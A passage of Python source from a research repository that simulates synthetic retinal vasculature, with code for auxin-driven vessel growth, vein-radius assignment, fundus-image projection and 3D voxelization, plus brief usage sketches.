#auxin_min_dists = np.delete(auxin_min_dists,j,0)
#print("to grow indicator is: \n"); print(to_grow_indicator)
#print("new point dists are: \n");print(auxin_vein_dists)
#print("new point dists are: \n");print(auxin_min_dists)
#while there are auxin nodes left or max_counts has been exceeded
#print(f"active_auxin: {len(active_auxin)}"); print(f"count: {count}")
return np.array(pt_list), branches, branch_membership, init_sample
def convert_from_product(pt_list):
new_pts = []
for pt in pt_list:
new_pts.append(pt[1]*np.array(pt[0]))
return np.array(new_pts)
def restrict_branches(pts,branches,branch_membership,max_height = -0.1):
pt_birth_times = np.zeros(len(pts))
pt_birth_times[0] = 1.
for br in branches:
for i in range(1,len(br)):
if pts[br[i]][-1] > max_height:
pt_birth_times[br[i]] = np.inf
else:
pt_birth_times[br[i]] = pt_birth_times[br[i-1]] + 1
#prune for points with birth times < infinity
new_branches = [[] for br in branches]
new_branch_membership = [[] for pt in pts]
for i in range(len(new_branches)):
for br_pt in branches[i]:
if pt_birth_times[br_pt] < np.inf:
new_branches[i].append(br_pt)
new_branch_membership[br_pt].append(i)
else:
break
return new_branches, new_branch_membership
#new_branches, new_branch_membership = restrict_branches(pts,pt_idx,branches,branch_membership)
def extract_graph(num_pts,branches):
#construct network
all_edges = []
for br in branches:
for i in range(len(br)-1):
all_edges.append((br[i],br[i+1]))
all_edges = list(set(all_edges))
A = np.zeros((num_pts,num_pts))
for e in all_edges:
A[e[0],e[1]] = 1
A[e[1],e[0]] = 1
#directed neighbors point from leafs to root
directed_neighbors = {i:[] for i in range(num_pts)}
for e in all_edges:
directed_neighbors[e[1]].append(e[0])
return np.array(all_edges), A,directed_neighbors
def get_vein_radii(directed_nbrs, A,init_radii = 0.05,branch_power = 3.):
num_pts = len(directed_nbrs)
vein_radii = np.zeros(num_pts)
#initialize leaves with init_radii
degrees = np.array([sum(r) for r in A])
vein_radii[degrees == 1] = init_radii
#make sure root does not have init_radii
vein_radii[0] = 0.
for i in range(num_pts)[::-1]:
for j in directed_nbrs[i]:
vein_radii[j] = (vein_radii[j]**branch_power + vein_radii[i]**branch_power)**(1./branch_power)
return vein_radii
def project_points(pts, A,projection_lim = 0.2):
projected_idx = np.arange(len(pts))[pts[:,2]<= projection_lim]
projected_pts = pts[projected_idx]
projected_A = A[np.ix_(projected_idx,projected_idx)]
projected_edges = []
for i in range(len(projected_A)-1):
for j in range(i+1, len(projected_A)):
if projected_A[i,j] >0:
projected_edges.append((i,j))
projected_edges = np.array(projected_edges)
return projected_pts, projected_edges,projected_idx
```
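A condensed end-to-end sketch of the pipeline this module provides, mirroring what `Vasculature.run_simulation` does in `model_runner.py` below: grow a small network, convert back to Euclidean coordinates, extract the graph, assign radii, and project to the fundus plane. Parameter values are arbitrary small-run choices, and the repository root is assumed to be on `sys.path`.
```python
# Hedged end-to-end sketch of the auxin simulation pipeline.
import numpy as np
import simulations.auxin_model as am

pts_prod, branches, branch_membership, auxin = am.vascular_growth_sim(
    init_num_pts=100, D_step=0.5, max_iter=300)      # small run for speed
coords = am.convert_from_product(pts_prod)           # (unit vector, radius) -> xyz
edges, A, d_nbrs = am.extract_graph(len(coords), branches)
radii = am.get_vein_radii(d_nbrs, A, init_radii=0.01, branch_power=3.0)
proj_pts, proj_edges, proj_idx = am.project_points(coords, A, projection_lim=0.2)
print(len(coords), "nodes,", len(edges), "edges,", len(proj_pts), "projected nodes")
```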
#### File: SyntheticVasculature/simulations/generate_retinas.py
```python
import argparse
import numpy as np
import os
import pandas as pd
import sys
import time
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import simulations.model_runner as MR
pe = os.path.exists
pj = os.path.join
HOME = os.path.expanduser("~")
def main(cfg):
output_dir = os.path.abspath( cfg["output_dir"] )
synet = MR.Vasculature("auxin", 500, output_dir+os.sep)
fovea_pos = [-0.5, 0.0, -0.5*np.sqrt(3)]
od_pos = [0.0, 0.5, -0.5*np.sqrt(3)]
synet.set_geometry(od=od_pos, fovea=fovea_pos)
time1 = time.time()
synet.run_simulation(step_size = 0.5, fovea_radius = 0.3)
time2 = time.time()
print("Simulation took {:.2f}s".format(time2-time1))
synet.generate_radii(0.1)
save_name = "sim_retina"
synet.generate_fundus_image(im_type="exact", save=True,
save_name=save_name)
synet.save_radii(save_name=save_name)
import pdb; pdb.set_trace()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output-dir", type=str,
default=pj(HOME, "Output/retina"))
cfg = vars( parser.parse_args() )
main(cfg)
```
#### File: SyntheticVasculature/simulations/model_runner.py
```python
import numpy as np
import os
import simulations.auxin_model as am
import simulations.voxelizer as vx  # used by Vasculature.voxelize()
import pyvista as pv
import scipy.spatial as spsp
from mayavi import mlab
import matplotlib.pyplot as plt
pe = os.path.exists
pj = os.path.join
HOME = os.path.expanduser("~")
class Vasculature:
model_type = None
init_num_pts = None
save_dir = None
voxel_size = 256
edges = None
d_nbrs = None
all_nbrs = None
coords = None
A = None
init_radii = 0.01
radii = None
edge_radii = None
SDF = None
voxels = None
fundus_image = None
def __init__(self,mt,inp,save_dir):
self.model_type = mt
self.init_num_pts = inp
self.save_dir = save_dir
return
def add_tumor(self):
#???
return
def set_geometry(self, od=None, fovea=None):
if od is not None:
am.g_od_pos = od
if fovea is not None:
am.g_fovea_pos = fovea
def run_simulation(self,step_size = 0.9,fovea_radius = 0.2,init_vasc = None,bounding_box=None):
if self.model_type == "auxin":
#run simulation
result = am.vascular_growth_sim(fovea_radius = fovea_radius, init_num_pts = self.init_num_pts,D_step = step_size,init_vasc = init_vasc,bounding_box=bounding_box)
#convert back to Euclidean coords
self.coords = am.convert_from_product(result[0])/1.2
init_sample = am.convert_from_product(result[-1])/1.2
branches = result[1]
branch_membership = result[2]
#extract
self.edges, self.A,self.d_nbrs = am.extract_graph(len(self.coords),branches)
all_nbrs = {i:[] for i in range(len(self.A))}
for e in self.edges:
all_nbrs[e[0]].append(e[1])
all_nbrs[e[1]].append(e[0])
self.all_nbrs = all_nbrs
self.edge_lookup = {tuple(np.sort(e)):i for i,e in enumerate(self.edges)}
self.radii = am.get_vein_radii(self.d_nbrs,self.A,init_radii = self.init_radii,branch_power = 3)
# import pdb; pdb.set_trace()
return
def generate_radii(self,init_r = 0.01):
self.init_radii = init_r
self.radii = am.get_vein_radii(self.d_nbrs,self.A,init_radii = init_r,branch_power = 3)
self.edge_radii = np.array([np.mean(self.radii[list(e)]) for e in self.edges])
return
def voxelize(self,fast_marching = True):
if self.edges is None:
self.run_simulation()
self.voxels = vx.generate_voxels(self.coords,self.voxel_size,self.edges,self.radii, fast_marching = fast_marching)
return
def generate_fundus_image(self,im_type="voxel",save = False,save_name = ""):
if im_type == "exact":
#set up circle mesh
thetas = 2.*np.pi*np.linspace(0,1,100)
xx = [1.1*np.cos(t) for t in thetas]
yy = [1.1*np.sin(t) for t in thetas]
xx.append(0); yy.append(0)
zz = [0. for i in xx]
tris = [[i,i+1,len(xx)-1] for i in range(len(xx)-2)]
tris.append([len(xx)-2,0,len(xx)-1])
tris = np.array(tris)
#draw mesh
mlab.figure(bgcolor=(0.,0.,0.), size=(1000,1000))
mlab.triangular_mesh(xx,yy,zz,tris,
opacity = 0.5,color = (0.95,0.7,0.1))
proj_pts, proj_e,proj_idx = am.project_points(self.coords, self.A)
src = mlab.plot3d(-proj_pts[:,0],proj_pts[:,1],[0. for p in proj_pts],0.01*self.radii[proj_idx],color=(1.,0.,0.))
src.parent.parent.filter.vary_radius = 'vary_radius_by_absolute_scalar'
src.mlab_source.dataset.lines = proj_e
lines = mlab.pipeline.stripper(src)
# import pdb; pdb.set_trace()
if save:
mlab.savefig(f"{self.save_dir}plots/{save_name}_exact-vein_radius-{self.init_radii:.3f}.png", size = (300,300))
mlab.close("all")
else:
mlab.show()
elif im_type == "voxel":
if self.voxels is None:
self.voxelize()
test_image = np.zeros((self.voxel_size+1,self.voxel_size+1))
for v in self.voxels:
if v[2] <= self.voxel_size/3.:
test_image[int(v[0]),int(v[1])] += 1
plt.imshow(test_image)
if save:
plt.savefig(f"{self.save_dir}plots/{save_name}_voxel-vein_radius-{self.init_radii:.3f}.png", size = (300,300))
plt.close("all")
else:
plt.show()
return
def generate_SDF(self):
if self.radii is None:
self.generate_radii()
inner_KDTREE = spsp.KDTree(self.coords)
def inner_SDF(pt):
nns = inner_KDTREE.query(pt,k=2)[1]
min_pair = None
min_dist = np.inf
for ii in nns:
for jj in self.all_nbrs[ii]:
proposed_dist = dist_to_line(pt,self.coords[ii],self.coords[jj])
if proposed_dist < min_dist:
min_pair = (ii,jj)
min_dist = proposed_dist
            # use the edge that actually realised the minimum distance
            return min_dist - self.edge_radii[self.edge_lookup[tuple(np.sort(min_pair))]]
self.SDF = lambda x: inner_SDF(x)
return
def save_simulation(self,save_name = ""):
np.save( pj(self.save_dir, f"plots/{save_name}_edges") ,self.edges )
np.save( pj(self.save_dir, f"plots/{save_name}_coords") ,self.coords )
return
def load_simulation(self,save_name = "",model_type = "auxin"):
        self.edges = np.load( pj(self.save_dir, f"plots/{save_name}_edges.npy") )
        self.coords = np.load( pj(self.save_dir, f"plots/{save_name}_coords.npy") )
self.init_num_pts = len(self.coords)
self.model_type = model_type
return
def save_radii(self,save_name=""):
np.save(f"{self.save_dir}plots/{save_name}_radii-vein_radius-{self.init_radii:.3f}",self.radii)
return
def load_radii(self,init_radii,save_name=""):
        self.radii = np.load(f"{self.save_dir}plots/{save_name}_radii-vein_radius-{init_radii:.3f}.npy")
return
def save_voxels(self,save_name=""):
np.save(f"{self.save_dir}plots/{save_name}_voxel_centers-vein_radius-{self.init_radii:.3f}",self.voxels)
np.save(f"{self.save_dir}plots/{save_name}_voxel_fundus_image-vein_radius-{self.init_radii:.3f}",self.fundus_image)
return
def load_voxels(self,init_radii,save_name=""):
        self.voxels = np.load(f"{self.save_dir}plots/{save_name}_voxel_centers-vein_radius-{init_radii:.3f}.npy")
        self.fundus_image = np.load(f"{self.save_dir}plots/{save_name}_voxel_fundus_image-vein_radius-{init_radii:.3f}.npy")
return
def save_all_csv(self,save_name = ""):
#get and save coords
#get and save adj
#get and save adjD
#get and save leaves
return
def dist_to_line(pt, line_pt1, line_pt2):
"""
returns the distance of a point pt to the line spanned by line_pt1 and line_pt2
:param pt: np.array; the point in question
:param line_pt1: np.array; one endpoint of the line segment in question
:param line_pt2: np.array; another endpoint of the line segment in question
:return dist: the distance from the point to the line
"""
try:
#print(f"pt: {pt}, line_pt1: {line_pt1}, line_pt2: {line_pt2}")
        s1 = np.array(line_pt2, dtype=float) - np.array(line_pt1, dtype=float)
        s1 /= np.linalg.norm(s1)
        # perpendicular distance from pt to the line through line_pt1 with direction s1
        v = np.array(pt, dtype=float) - np.array(line_pt1, dtype=float)
        dist = np.linalg.norm(v - np.dot(v, s1) * s1)
        return dist
except:
return np.linalg.norm(pt - line_pt1)
```
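A short sketch of how the signed-distance interface above can be queried once a simulation has run. Importing `model_runner` pulls in `pyvista` and `mayavi` at module level, so those are assumed to be installed even though the SDF itself only needs NumPy/SciPy; the save directory is a placeholder.
```python
# Hedged usage sketch: query the network's signed distance function at a point.
# Assumes simulations.model_runner is importable (mayavi/pyvista installed).
import numpy as np
from simulations.model_runner import Vasculature

syn = Vasculature("auxin", 100, "./output/")
syn.run_simulation(step_size=0.5, fovea_radius=0.3)
syn.generate_radii(0.01)     # also fills edge_radii, which generate_SDF needs
syn.generate_SDF()
# roughly: distance to the nearest vessel surface (negative inside a vessel)
print(syn.SDF(np.array([0.0, 0.0, -0.9])))
```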
#### File: SyntheticVasculature/simulations/voxelizer.py
```python
import numpy as np
def Bresenham3D(p1, p2):
#from https://www.geeksforgeeks.org/bresenhams-algorithm-for-3-d-line-drawing/
x1, y1, z1 = p1
x2, y2, z2 = p2
ListOfPoints = []
ListOfPoints.append((x1, y1, z1))
dx = abs(x2 - x1)
dy = abs(y2 - y1)
dz = abs(z2 - z1)
if (x2 > x1):
xs = 1
else:
xs = -1
if (y2 > y1):
ys = 1
else:
ys = -1
if (z2 > z1):
zs = 1
else:
zs = -1
# Driving axis is X-axis"
if (dx >= dy and dx >= dz):
p1 = 2 * dy - dx
p2 = 2 * dz - dx
while (x1 != x2):
x1 += xs
if (p1 >= 0):
y1 += ys
p1 -= 2 * dx
if (p2 >= 0):
z1 += zs
p2 -= 2 * dx
p1 += 2 * dy
p2 += 2 * dz
ListOfPoints.append((x1, y1, z1))
# Driving axis is Y-axis"
elif (dy >= dx and dy >= dz):
p1 = 2 * dx - dy
p2 = 2 * dz - dy
while (y1 != y2):
y1 += ys
if (p1 >= 0):
x1 += xs
p1 -= 2 * dy
if (p2 >= 0):
z1 += zs
p2 -= 2 * dy
p1 += 2 * dx
p2 += 2 * dz
ListOfPoints.append((x1, y1, z1))
# Driving axis is Z-axis"
else:
p1 = 2 * dy - dz
p2 = 2 * dx - dz
while (z1 != z2):
z1 += zs
if (p1 >= 0):
y1 += ys
p1 -= 2 * dz
if (p2 >= 0):
x1 += xs
p2 -= 2 * dz
p1 += 2 * dy
p2 += 2 * dx
ListOfPoints.append((x1, y1, z1))
return ListOfPoints
def generate_voxels(coords,voxel_size,edges,radii,fast_marching = True):
"""
generates the voxelization for an embedded tree, with radii associated to vertices/edges
:param coords: np.array; the coordinates of vertices in the tree
:param voxel_size: int; the sidelength of the voxel cube the tree is embedded in
:param edges: np.array; the list of edges in the tree
:param radii: np.array; the list of radii associated to the tree, either with vertices or edges
:return voxel_centers: np.array; the list of voxel centers in the voxelization
"""
if len(radii) == len(coords):
#adapt vertex-based radii to edge-based radii
radii = np.array([np.mean(radii[list(e)]) for e in edges])
#get bounding box
bbox_bounds = np.array([(np.min(coords[:,i]),np.max(coords[:,i])) for i in range(coords.shape[1]) ])
#print("bbox bounds: "); print(bbox_bounds)
#convert 3d coords to voxel centers
data_scaling = voxel_size/np.max([bb[1]-bb[0] for bb in bbox_bounds])
#print("data scaling:"); print(data_scaling)
new_pts = ((coords - bbox_bounds[:,0])*data_scaling).astype(int)
if fast_marching:
voxel_centers = []
front = []
#front_dict keeps track of whether a voxel has been checked, what its nearest edge neighbor is, and the distance to that edge neighbor
front_dict = {}
#start by getting the bresenham points
for e_idx,e in enumerate(edges):
front_to_add = Bresenham3D(new_pts[e[0]],new_pts[e[1]])
#print(f"front to add: {front_to_add}")
for pt in front_to_add:
try:
if front_dict[pt]["front"] == 0:
pass
except:
front_dict[pt] = {"front" : 0, "nearest_edge" : e_idx, "dist_to_edge" : 0.}
front.append(pt)
#now propogate the front
while(len(front) > 0):
#pop a member of the front. If it's close to it's nearest edge, add it to voxelization and consider neighbors
temp_pt = front.pop(0)
#check whether the point has been checked yet
if front_dict[temp_pt]["front"] == 0:
#if it hasn't, get the edge info
nearest_edge_idx = front_dict[temp_pt]["nearest_edge"]
nearest_edge = edges[nearest_edge_idx]
#check whether the proposed voxel is close enough to the edges
if front_dict[temp_pt]["dist_to_edge"] <= radii[nearest_edge_idx]*data_scaling:
#point is close enough to an edge, so add it to the voxels
voxel_centers.append(temp_pt)
for nn in voxel_nn(temp_pt,voxel_size):
#check each nn, whether they've been seen and/or the current edge is closer
try:
#try checking whether the next point is closer to this edge or another
new_dist = dist_to_line(nn,new_pts[nearest_edge[0]],new_pts[nearest_edge[1]])
if front_dict[nn]["dist_to_edge"] > new_dist:
#if the last voxels edge is closer than what was written, rewrite
front_dict[nn]["dist_to_edge"] = new_dist
front_dict[nn]["nearest_edge"] = nearest_edge_idx
except:
#nn hasn't been seen yet, so add it to the front and initialize an entry in the dict
dist_to_edge = dist_to_line(nn,new_pts[nearest_edge[0]],new_pts[nearest_edge[1]])
front_dict[nn] = {"front" : 0, "nearest_edge" : nearest_edge_idx, "dist_to_edge" : dist_to_edge}
front.append(nn)
#regardless, the point is no longer in the front
                front_dict[temp_pt]["front"] = 1
#once the front has propogated through, collect the remaining voxels
else:
#for each edge in the network, draw the line with width along edge
voxel_centers = set()
#for each edge
for ii,e in enumerate(edges):
##compute the correct Rotation + translation
pt1 = coords[e[0]]
pt2 = coords[e[1]]
R = edge_affine_transform(pt1,pt2)
p = new_pts[e[0]]
##draw the corresponding cylinder
cyl_voxels = generate_voxel_cylinder((np.linalg.norm(pt2-pt1)*data_scaling).astype(int),(radii[ii]*data_scaling).astype(int),affine_transformation = [R,p],return_set = True)
voxel_centers = voxel_centers.union(cyl_voxels)
return np.array(list(voxel_centers))
def dist_to_line(pt, line_pt1, line_pt2):
"""
returns the distance of a point pt to the line spanned by line_pt1 and line_pt2
:param pt: np.array; the point in question
:param line_pt1: np.array; one endpoint of the line segment in question
:param line_pt2: np.array; another endpoint of the line segment in question
:return dist: the distance from the point to the line
"""
if tuple(line_pt1) == tuple(line_pt2):
return np.linalg.norm(np.array(pt) - line_pt1)
else:
#print(f"pt: {pt}, line_pt1: {line_pt1}, line_pt2: {line_pt2}")
        s1 = np.array(line_pt2).astype(float) - np.array(line_pt1).astype(float)
        s1 /= np.linalg.norm(s1)
        # perpendicular distance from pt to the line through line_pt1 with direction s1
        v = np.array(pt).astype(float) - np.array(line_pt1).astype(float)
        dist = np.linalg.norm(v - np.dot(v, s1) * s1)
return dist
def voxel_nn(pt,voxel_size):
"""
compute the adjacent voxels to a given voxel
:param pt: tuple; the center voxel
:param voxel_size: int; the size of the voxel cube (side length)
:return nn: list; list of nearest neighbor voxel neighbors in the voxel grid
"""
nn = []
perturb_vals = [-1.,0.,1.]
perturb_pts = np.array([(ii,jj,kk) for ii in perturb_vals for jj in perturb_vals for kk in perturb_vals])
for pp in perturb_pts:
proposed = pp + pt
if (np.min(proposed) >=0.) and (np.max(proposed) <= voxel_size):
nn.append(tuple(proposed))
return nn
def generate_voxel_cylinder(cyl_length,cyl_radius,affine_transformation = None,return_set = True):
"""
generates a standard voxelized cylinder as an alternative to Bresenham's algorithm with thickness
:param cyl_length: int; the length of the cylinder, in voxels along the x-axis
:param cyl_radius: int; the radius of the cylinder, in voxels in the y-z plane
:param affine_trnasformation: [R,p]; list of rotation array R and translation vector p
:return: a list of voxel centers
"""
if affine_transformation is None:
cyl_voxels = [(float(ii),0.,0.) for ii in range(cyl_length)]
temp_idx = cyl_radius
#start at the top of the circle and work down
while temp_idx > 0:
#extend the voxels in the x direction
for jj in range(int(np.sqrt(cyl_radius**2 - temp_idx**2))+1):
#print(f"jj is {jj}")
for ii in range(cyl_length):
cyl_voxels.append((float(ii), float(jj), float(temp_idx)))
cyl_voxels.append((float(ii), float(temp_idx),-float(jj)))
cyl_voxels.append((float(ii), -float(jj), -float(temp_idx)))
cyl_voxels.append((float(ii), -float(temp_idx),float(jj)))
temp_idx -= 1
else:
R, p = affine_transformation
cyl_voxels = [Rp(R,p,(float(ii),0.,0.)) for ii in range(cyl_length)]
temp_idx = cyl_radius
#start at the top of the circle and work down
while temp_idx > 0:
#extend the voxels in the x direction
for jj in range(int(np.sqrt(cyl_radius**2 - temp_idx**2))+1):
#print(f"jj is {jj}")
for ii in range(cyl_length):
cyl_voxels.append(Rp(R,p, (float(ii), float(jj), float(temp_idx)) ))
cyl_voxels.append(Rp(R,p, (float(ii), float(temp_idx),-float(jj)) ))
cyl_voxels.append(Rp(R,p, (float(ii), -float(jj), -float(temp_idx)) ))
cyl_voxels.append(Rp(R,p, (float(ii), -float(temp_idx),float(jj)) ))
temp_idx -= 1
if return_set:
return set(cyl_voxels)
else:
return list(set(cyl_voxels))
def edge_affine_transform(pt1, pt2):
"""
given initial point pt1 and terminal point pt2, compute the affine transformation from (1.,0.,0.) to pt2 - pt1
:param pt1: np.array; initial point
:param pt2: np.array; terminal point
:return R, p: [np.array, tuple]; linear transformation and translation to move and orient edge from origin, (1.,0.,0.)
"""
s1 = np.array(pt2) - pt1
s1 /= np.linalg.norm(s1)
#compute orthogonal plane
if np.abs(s1[0]) > 1e-6:
s2 = np.array([(-s1[1]-s1[2])/s1[0],1.,1.])
elif np.abs(s1[1]) > 1e-6:
s2 = np.array([1.,(-s1[0]-s1[2])/s1[1],1.])
else:
s2 = np.array([1.,1.,(-s1[0]-s1[1])/s1[2]])
s2 /= np.linalg.norm(s2)
s3 = np.array([s1[1]*s2[2] - s1[2]*s2[1],-s1[0]*s2[2] + s1[2]*s2[0],s1[0]*s2[1] - s1[1]*s2[0]])
s3 /= np.linalg.norm(s3)
return np.vstack([s1,s2,s3]).T
def Rp(R,p,pt):
"""
explicitly computes the affine transformation R * pt + p
:param R: np.array; linear transformation
:param p: np.array; translation vector
:param pt: tuple; point to be transformed by
:return new_pt: tuple; transformed point
"""
print(R)
print(p)
new_pt = tuple([ int(sum([R[i][j]*pt[j] for j in range(len(pt))]) + p[i]) for i in range(len(R))])
return new_pt
def sample_SOn(n):
"""
sample a matrix in SO(n) by taking three vectors on the sphere and orthogonalizing
:param n: int; dimension of ambient space
:return A: np.array; resulting matrix in SO(n)
"""
samples = [np.random.normal(size = n) for i in range(n)]
samples = [s/np.linalg.norm(s) for s in samples]
s1 = samples[0]
s2 = samples[1] - np.dot(samples[1],s1)*s1
s2 /= np.linalg.norm(s2)
s3 = samples[2] - np.dot(samples[2],s1)*s1 - np.dot(samples[2],s2)*s2
s3 /= np.linalg.norm(s3)
return np.vstack([s1,s2,s3]).T
def run_voxelization_test(cyl_length = 3, cyl_radius = 3,affine_transformation = True):
from mayavi import mlab
import time
if affine_transformation == True:
affine_transformation = [sample_SOn(3),np.random.randint(low = 20, high = 50)*np.random.rand(3)]
else:
affine_transformation = None
tic = time.time()
voxel_centers = np.array(generate_voxel_cylinder(cyl_length,cyl_radius, affine_transformation = affine_transformation,return_set = False) )
toc = time.time()
print(f"time to compute was: {toc-tic:.3f}")
#for p in test:
# print(p)
mlab.points3d(voxel_centers[:,0],voxel_centers[:,1],voxel_centers[:,2], mode = "cube", scale_factor = 1.,opacity = 0.2,color= (0.9,0.,0.))
if affine_transformation is not None:
voxel_centers = np.array(generate_voxel_cylinder(cyl_length,cyl_radius, affine_transformation = None,return_set = False) )
mlab.points3d(voxel_centers[:,0],voxel_centers[:,1],voxel_centers[:,2], mode = "cube", scale_factor = 1.,opacity = 0.2,color= (0.,0.,0.9))
mlab.show()
return
#run_voxelization_test(cyl_length = 100)
def run_large_voxelization_test(edges = [[0,1],[0,2],[1,3],[1,4]], coords = np.array([[0.,0.,0.],[0.,1.,0.],[0.,0.,1.],[0.,1.,1.],[1.,1.,0.]]),radii = 0.5*np.array([0.2,0.1,0.05,0.025])):
from mayavi import mlab
import time
tic = time.time()
voxel_centers = generate_voxels(coords, 100,edges,radii)
toc = time.time()
print(f"time to compute was: {toc-tic:.3f}")
#for p in test:
# print(p)
mlab.points3d(voxel_centers[:,0],voxel_centers[:,1],voxel_centers[:,2], mode = "cube", scale_factor = 1.,opacity = 0.2,color= (0.9,0.,0.))
mlab.show()
return
#run_large_voxelization_test()
```
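A quick, plot-free check of the rasterization primitives above: trace a 3-D segment with `Bresenham3D` and voxelize a tiny two-edge tree with `generate_voxels`. The coordinates and radii are made up, and the repository root is assumed to be on `sys.path`.
```python
# Hedged example: exercise the voxelization primitives without any plotting.
import numpy as np
from simulations.voxelizer import Bresenham3D, generate_voxels

# voxel centres on the line between two grid points
line = Bresenham3D((0, 0, 0), (5, 3, 1))
print(len(line), "voxels on the segment, ending at", line[-1])

# a two-edge "tree" voxelized on a 32^3 grid with per-edge radii
coords = np.array([[0., 0., 0.], [0., 1., 0.], [1., 1., 0.]])
edges = np.array([[0, 1], [1, 2]])
radii = np.array([0.05, 0.05])
voxels = generate_voxels(coords, 32, edges, radii, fast_marching=True)
print(voxels.shape[0], "filled voxels")
```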
#### File: SyntheticVasculature/TMD/vessel_sim_commands.py
```python
import io
import numpy as np
from scipy import spatial as spspat
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy import integrate as spint
import time
def sphere_init_config(fovea_radius = 0.3,lens_depth = 0.3,num_pts = 100,inner_rad = 0.8,outer_rad = 1.2,prune_into_eye = True):
"""
sample = np.random.normal(size = (num_pts,3))
random_radii = np.random.rand(num_pts)*(outer_rad-inner_rad)+inner_rad
sample = [[sample[i]/np.linalg.norm(sample[i]),random_radii[i]] for i in range(len(sample))]
if prune_into_eye:
#remove portions near iris
for i in range(len(sample)-1,-1,-1):
#print(i)
if (sample[i][0][-1] > 1-lens_depth) or (np.linalg.norm(sample[i][0] - np.array([0.,0.,-1.])) < fovea_radius):
sample.pop(i)
"""
sample = []
while(len(sample) < num_pts):
pt = np.random.normal(size = 3)
pt /= np.linalg.norm(pt)
pt_rad = np.random.rand()*(outer_rad-inner_rad)+inner_rad
sample_pt = [pt,pt_rad]
if prune_into_eye:
if ((pt*pt_rad)[-1] <= 1-lens_depth) and (np.linalg.norm(pt*pt_rad - np.array([0.,0.,-1.])) >= fovea_radius):
sample.append(sample_pt)
    return np.array(sample, dtype=object)
def geodesic_dist(p1,p2):
p1norm = np.linalg.norm(p1[0])
p2norm = np.linalg.norm(p2[0])
p1dotp2 = np.dot(p1[0],p2[0])
if np.abs(p1dotp2)>1.:
p1dotp2 = np.sign(p1dotp2)
return np.arccos(p1dotp2) + np.abs(p1[1] - p2[1])
def tangent_vector(p1,p2,normalized = True):
p1dotp2 = np.dot(p1[0],p2[0])
if np.abs(p1dotp2)>1.:
p1dotp2 = np.sign(p1dotp2)
p2bar = p2[0] - (p1dotp2)*np.array(p1[0])
p2bar /= np.linalg.norm(p2bar)
#print(p1dotp2)
if normalized:
        return np.array([p2bar,(p2[1]-p1[1])/np.abs(p2[1]-p1[1])],dtype=object)
    else:
        return np.array([(np.arccos(p1dotp2))*p2bar, p2[1]-p1[1]],dtype=object)
def exp_map(pt, direction):
dirnorm = np.linalg.norm(direction[0])
#pt_dot_dir = np.dot(pt,dir)
#dir_bar = dir - pt_dot_dir*np.array(pt)
#dir_bar /= np.linalg.norm(dir_bar)
#theta_star = np.arccos(pt_dot_dir)
    return np.array([np.cos(dirnorm)*np.array(pt[0]) + np.sin(dirnorm)*np.array(direction[0])/dirnorm,pt[1]+direction[1] ],dtype=object)
#exp_map([0.,0.,1.2],tangent_vector([0.,0.,1.2],[0.,1,0.]))
"""
p1 = [[0.,0.,1.],1.1]
p2 = [[0.0,1.1,0.],0.9]
print(geodesic_dist(p1,p2))
print(tangent_vector(p1,p2))
"""
"""
X = sphere_init_config(num_pts = 1000)
fig = plt.figure()
ax = fig.add_subplot(111,projection="3d")
ax.scatter(X[:,0],X[:,1],X[:,2])
plt.show()
"""
def prune_dist_chart(dist_chart,min_dist_pointers,death_dist = 0.1):
return
def vascular_growth_sim(num_iterations = 3,fovea_radius = 0.3,lens_depth = 0.5,noisy = True,max_iter = 10,init_num_pts = 1000,inner_rad = 0.7,outer_rad = 1.2, growth_type = "average",weighted_stepsizes = True,D_step = 0.05,death_dist = 0.05,save_time_data = False):
#set up data structure
    pt_list = np.array([[[0.5,0.,-0.5*np.sqrt(3)],outer_rad]], dtype=object)  # object dtype avoids ragged-array errors on newer NumPy
to_grow_indicator = np.array([1])
branches = [[0]]
branch_membership = [[0]]
if save_time_data:
time_data = [[pt_list,list(branches),list(branch_membership)]]
#start the iteration
for iter_count in range(num_iterations):
#sample auxin
if iter_count == 0:
sample_auxin = sphere_init_config(fovea_radius = fovea_radius,lens_depth = lens_depth,num_pts = init_num_pts,inner_rad = inner_rad,outer_rad = outer_rad)
init_sample = np.array(sample_auxin)
else:
sample_auxin = sphere_init_config(fovea_radius = fovea_radius,lens_depth = lens_depth,num_pts = 2**iter_count*init_num_pts,inner_rad = inner_rad,outer_rad = outer_rad)
D_step = D_step/(2**iter_count);death_dist = death_dist/(2**iter_count)
init_sample = np.vstack([init_sample,sample_auxin])
#print("sampled points are: \n");print(sample_auxin)
#set up auxin-vein node distance chart
if iter_count == 0:
auxin_vein_dists = [geodesic_dist(pt_list[0],s) for s in sample_auxin]
auxin_min_dists = [[0,d] for d in auxin_vein_dists ]
else:
auxin_vein_dists = np.array([[geodesic_dist(pt,s) for s in sample_auxin] for pt in pt_list])
auxin_min_dists = []
for s_idx in range(len(sample_auxin)):
argmin_idx = np.argmin(auxin_vein_dists[:,s_idx])
auxin_min_dists.append([argmin_idx,auxin_vein_dists[argmin_idx,s_idx]])
auxin_min_dists = np.array(auxin_min_dists)
#print("sampled point dists are: \n");print(auxin_vein_dists)
#print("sampled point dists are: \n");print(auxin_min_dists)
count = 0
#"while there are auxin nodes"
while((count < max_iter) and (len(sample_auxin)>0)):
if noisy:
print("at step {}".format(count))
count += 1
#manually find the nearest neighbor
nns = [[] for pt in pt_list]
#print("getting nearest neighbors for {} auxin".format(len(sample_auxin)))
for i in range(len(sample_auxin)):
#match the nearest neighbor of an auxin node to the index of said auxin node
nns[int(auxin_min_dists[i][0])].append(i)
#now compute the step vectors
#print("the to grow indicators are {}".format(to_grow_indicator))
for i in range(len(pt_list))[::-1]:
#print("the nearest neighbors for {} are {}".format(i,nns[i]))
#print("pt {} s nearest neighbors are: {}".format(i,nns[i]))
if len(nns[i])>0:
#check if the given point is a head or not
#if not, generate a new branch
if to_grow_indicator[i] == 0:
branches.append([i])
branch_membership[i].append(len(branches)-1)
#get the step vector for the grown point
#geometry_type = "average" means
if growth_type == "average":
if weighted_stepsizes:
step_vec = sum([(1./len(nns[i]))*tangent_vector(pt_list[i],sample_auxin[k],normalized = True) for k in nns[i]])
vprime = exp_map(pt_list[i], [D_step*step_vec[0],D_step*step_vec[1]])
else:
step_vec = sum([(1./len(nns[i]))*tangent_vector(pt_list[i],sample_auxin[k],normalized = False) for k in nns[i]])
vprime = exp_map(pt_list[i], [D_step*step_vec[0],D_step*step_vec[1]])
elif growth_type == "nearest":
#print(auxin_vein_dists)
#print(auxin_vein_dists[i])
if len(pt_list) == 1:
nearest_auxin = 0
else:
